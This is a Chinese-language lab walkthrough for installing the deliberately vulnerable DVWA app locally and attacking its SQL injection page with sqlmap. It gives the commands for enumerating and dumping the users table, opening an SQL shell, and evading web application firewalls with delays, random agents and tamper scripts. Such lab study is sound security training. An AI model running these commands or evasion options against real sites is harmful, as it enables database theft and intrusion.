1、安裝PHP集成環境
安裝phpstudy
2、安裝DVWA
C:\phpStudy\PHPTutorial\WWW目錄下解壓
$_DVWA[ ‘db_password’ ] = ‘root’;
admin:password
輸入信息
3、設置代理開始抓包
4、開始探測
掃描語句
sqlmap “http://192.168.48.128:8023/DVWA-1.9/vulnerabilities/sqli/?id=112233&Submit=Submit#”
加cookies
sqlmap “http://192.168.48.128:8023/DVWA-1.9/vulnerabilities/sqli/?id=112233&Submit=Submit#” --cookie “security=low; PHPSESSID=mt7f5ll2o7qg6dq5egaa7htnq2”
掃描等級
sqlmap “http://192.168.48.128:8023/DVWA-1.9/vulnerabilities/sqli/?id=112233&Submit=Submit#” --cookie “security=low; PHPSESSID=mt7f5ll2o7qg6dq5egaa7htnq2” --level=3
基於文件列表
sqlmap -m list.txt
不使用緩存
–flush-session
探測數據庫名
sqlmap “http://192.168.48.128:8023/DVWA-1.9/vulnerabilities/sqli/?id=112233*&Submit=Submit#” --cookie “security=low; PHPSESSID=mt7f5ll2o7qg6dq5egaa7htnq2” --level=3 --dbs
探測數據庫表名
sqlmap “http://192.168.48.128:8023/DVWA-1.9/vulnerabilities/sqli/?id=112233*&Submit=Submit#” --cookie “security=low; PHPSESSID=mt7f5ll2o7qg6dq5egaa7htnq2” --level=3 -D dvwa --tables
探測數據庫列表名
sqlmap “http://192.168.48.128:8023/DVWA-1.9/vulnerabilities/sqli/?id=112233*&Submit=Submit#” --cookie “security=low; PHPSESSID=mt7f5ll2o7qg6dq5egaa7htnq2” --level=3 -D dvwa -T users --columns
探測數據庫數據
sqlmap “http://192.168.48.128:8023/DVWA-1.9/vulnerabilities/sqli/?id=112233*&Submit=Submit#” --cookie “security=low; PHPSESSID=mt7f5ll2o7qg6dq5egaa7htnq2” --level=3 -D dvwa -T users --dump
–technique B E U S T
Boolean-based blind #基於布爾
Error-based #基於錯誤
Union query-based #基於聯合查詢
Stacked queries(對文件系統、操作系統、註冊表操作時,必須指定該方式) #堆疊查詢
Time-based blind #基於時間
所有
-a
通過代理
–proxy=“http://1.1.1.1:8080”
動態
–random-agent
sql命令行
–sql-shell
exit #退出
5、提升等級
sqlmap -r 1.txt
6、繞過waf的一些參數:
-delay 每次http(s)請求之間延遲時間,浮點數,單位爲秒,默認無延遲
-timeout 請求超時時間,浮點數,默認爲30秒
-retries http(s)連接超時重試次數,默認3次
-randomize 長度、類型與原始值保持一致的前提下,指定每次請求隨機取值的參數
http://192.168.1.1/?id=100 –randomize(id)
–tamper 發送數據混淆腳本(類似於編碼) 腳本位置 /usr/share/sqlmap/tamper/
